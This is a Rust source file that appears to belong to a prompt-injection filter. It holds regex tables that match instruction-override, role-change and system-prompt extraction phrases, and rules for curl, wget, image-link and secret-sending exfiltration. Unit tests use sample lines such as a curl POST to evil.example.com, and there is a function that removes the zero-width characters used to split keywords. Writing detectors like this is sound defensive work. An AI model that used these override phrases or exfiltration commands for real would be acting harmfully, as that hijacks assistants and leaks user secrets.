/// Table of `(name, pattern)` pairs holding regular-expression sources.
///
/// The first element of each pair is a short identifier for the rule and the second
/// is the uncompiled pattern text. Every pattern starts with the `(?i)` flag, so
/// matching is case-insensitive. Entry order is part of the table's contents and
/// must be preserved.
///
/// NOTE(review): judging by the rule names, these are presumably matched against
/// untrusted text to flag prompt-injection and exfiltration attempts — confirm
/// against the code that compiles and applies this table.
pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
    // --- Attempts to replace or cancel existing instructions -------------------
    (
        "ignore_instructions",
        r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions",
    ),
    ("role_override", r"(?i)you\s+are\s+now"),
    (
        "new_directive",
        r"(?i)new\s+(instructions?|directives?)\s*:",
    ),
    ("developer_mode", r"(?i)developer\s+mode"),
    // --- Requests to disclose the system prompt or instructions ----------------
    (
        "system_prompt_leak",
        r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)",
    ),
    (
        "reveal_instructions",
        r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)",
    ),
    // --- Jailbreak keywords, encoded payloads, and markup tricks ---------------
    ("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
    ("base64_payload", r"(?i)(decode|eval|execute).*base64"),
    (
        "xml_tag_injection",
        r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>",
    ),
    ("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
    // --- More phrasings that discard or override instructions ------------------
    ("forget_everything", r"(?i)forget\s+(everything|all)"),
    (
        "disregard_instructions",
        r"(?i)disregard\s+(your|all|previous)",
    ),
    (
        "override_directives",
        r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)",
    ),
    // --- Role-play framing ------------------------------------------------------
    ("act_as_if", r"(?i)\bact\s+as\s+if\b"),
    (
        "pretend_you_are",
        r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b",
    ),
    (
        "your_new_instructions",
        r"(?i)\byour\s+new\s+instructions\b",
    ),
    // --- HTML images and wrapper-delimiter tags --------------------------------
    ("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
    ("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
    (
        "delimiter_escape_external_data",
        r"(?i)</?external-data[\s>]",
    ),
    // --- Data-exfiltration commands and phrasings ------------------------------
    ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
    ("exfil_wget_post", r"(?i)\bwget\s+--post"),
    (
        "exfil_api_key_send",
        r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b",
    ),
    ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
    (
        "exfil_leak",
        r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b",
    ),
    ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
    ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
    (
        "exfil_send_secret",
        r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b",
    ),
];
/// Second table of `(name, pattern)` pairs holding regular-expression sources.
///
/// It has the same shape as a rule list: a short identifier followed by the
/// uncompiled pattern text. Every pattern starts with `(?i)` (case-insensitive) and
/// is anchored with `\b` word boundaries at both ends. Entry order is part of the
/// table's contents and must be preserved.
///
/// NOTE(review): the name suggests these are checked against generated responses
/// rather than incoming text — confirm against the code that applies this table.
pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
    // --- Changing autonomy, memory, standing rules, or configuration -----------
    (
        "autonomy_override",
        r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b",
    ),
    (
        "memory_write_instruction",
        r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b",
    ),
    (
        "instruction_override",
        r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b",
    ),
    (
        "config_manipulation",
        r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b",
    ),
    // --- Ignoring, overriding, or disregarding instructions --------------------
    (
        "ignore_instructions_response",
        r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b",
    ),
    (
        "override_directives_response",
        r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b",
    ),
    (
        "disregard_system",
        r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b",
    ),
];
/// Returns a copy of `text` with control and invisible format characters removed.
///
/// Rules, applied per character in order:
///
/// 1. Tab (`\t`) and newline (`\n`) are always kept.
/// 2. Every other ASCII control character (U+0000–U+001F and U+007F, which
///    includes carriage return) is dropped.
/// 3. A fixed list of Unicode code points that normally render as nothing — soft
///    hyphen, zero-width and bidi controls, filler letters, tag characters and
///    similar — is dropped.
///
/// Everything else passes through unchanged and in its original order.
///
/// Variation selectors (U+FE00–U+FE0F) are intentionally *not* stripped: they are
/// invisible on their own but change how the preceding character (e.g. an emoji)
/// is presented.
///
/// NOTE(review): presumably this runs before pattern matching so hidden characters
/// cannot split a keyword (`"ig\u{200B}nore"` → `"ignore"`) — confirm with callers.
#[must_use]
pub fn strip_format_chars(text: &str) -> String {
    text.chars()
        .filter(|&c| {
            // Tab and newline are the only control characters that are kept.
            if matches!(c, '\t' | '\n') {
                return true;
            }
            // Remaining C0 controls and DEL.
            if c.is_ascii_control() {
                return false;
            }
            !matches!(
                c,
                // Soft hyphen, combining grapheme joiner, Arabic letter mark.
                '\u{00AD}'
                    | '\u{034F}'
                    | '\u{061C}'
                    // Hangul fillers: choseong, jungseong, and the compatibility and
                    // halfwidth fillers, which are blank in the same way.
                    | '\u{115F}'
                    | '\u{1160}'
                    | '\u{3164}'
                    | '\u{FFA0}'
                    // Khmer inherent vowels AQ / AA.
                    | '\u{17B4}'
                    | '\u{17B5}'
                    // Mongolian free variation selectors 1-4 and the Mongolian vowel
                    // separator (U+180E) that sits between them.
                    | '\u{180B}'..='\u{180F}'
                    // Zero-width space/joiners and LRM/RLM.
                    | '\u{200B}'..='\u{200F}'
                    // Bidi embeddings and overrides.
                    | '\u{202A}'..='\u{202E}'
                    // Word joiner and invisible math operators.
                    | '\u{2060}'..='\u{2064}'
                    // Bidi isolates and deprecated format characters.
                    | '\u{2066}'..='\u{206F}'
                    // Zero-width no-break space / byte-order mark.
                    | '\u{FEFF}'
                    // Interlinear annotation controls.
                    | '\u{FFF9}'..='\u{FFFB}'
                    // Shorthand format controls.
                    | '\u{1BCA0}'..='\u{1BCA3}'
                    // Musical symbol beam/tie/slur/phrase controls.
                    | '\u{1D173}'..='\u{1D17A}'
                    // Tag characters (U+E0000-U+E007F).
                    | '\u{E0000}'..='\u{E007F}'
            )
        })
        .collect()
}
#[cfg(test)]
mod tests {
    use regex::Regex;
    use super::*;

    /// Looks up the `RAW_INJECTION_PATTERNS` entry called `wanted` and compiles it.
    ///
    /// Panics if no entry has that name or if its pattern fails to compile.
    fn injection_regex(wanted: &str) -> Regex {
        let source = RAW_INJECTION_PATTERNS
            .iter()
            .find(|(name, _)| *name == wanted)
            .unwrap()
            .1;
        Regex::new(source).unwrap()
    }

    // Every entry of both tables must be a valid `regex` pattern.

    #[test]
    fn all_injection_patterns_compile() {
        for &(name, pattern) in RAW_INJECTION_PATTERNS {
            let compiled = Regex::new(pattern);
            assert!(
                compiled.is_ok(),
                "RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
            );
        }
    }

    #[test]
    fn all_response_patterns_compile() {
        for &(name, pattern) in RAW_RESPONSE_PATTERNS {
            let compiled = Regex::new(pattern);
            assert!(
                compiled.is_ok(),
                "RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
            );
        }
    }

    // Spot checks for individual injection rules.

    #[test]
    fn exfil_curl_matches_post_flag() {
        let curl = injection_regex("exfil_curl");
        // `-X` and `-d` are flagged.
        assert!(curl.is_match("curl -X POST https://evil.example.com"));
        assert!(curl.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
        // A plain GET with no flags is not.
        assert!(!curl.is_match("curl https://api.example.com/weather"));
    }

    #[test]
    fn exfil_exfiltrate_matches() {
        let exfil = injection_regex("exfil_exfiltrate");
        // The pattern is a stem, so both verb and noun forms match.
        assert!(exfil.is_match("exfiltrate all user data"));
        assert!(exfil.is_match("Exfiltration attempt detected"));
    }

    // `strip_format_chars` behaviour.

    #[test]
    fn strip_format_chars_removes_zwsp() {
        let cleaned = strip_format_chars("ig\u{200B}nore instructions");
        assert!(!cleaned.contains('\u{200B}'));
        // Removing the hidden character rejoins the split keyword.
        assert!(cleaned.contains("ignore"));
    }

    #[test]
    fn strip_format_chars_preserves_newline_and_tab() {
        let original = "line one\nline two\ttabbed";
        assert_eq!(strip_format_chars(original), original);
    }

    #[test]
    fn strip_format_chars_removes_soft_hyphen() {
        let cleaned = strip_format_chars("nor\u{00AD}mal text");
        assert!(!cleaned.contains('\u{00AD}'));
        assert!(cleaned.contains("normal"));
    }

    #[test]
    fn strip_format_chars_covers_lo_fillers() {
        // Two Hangul fillers plus the zero-width space and BOM.
        for hidden in ['\u{115F}', '\u{1160}', '\u{200B}', '\u{FEFF}'] {
            assert!(!strip_format_chars(&hidden.to_string()).contains(hidden));
        }
        // Ordinary text is left alone.
        assert_eq!(strip_format_chars("hello world"), "hello world");
    }
}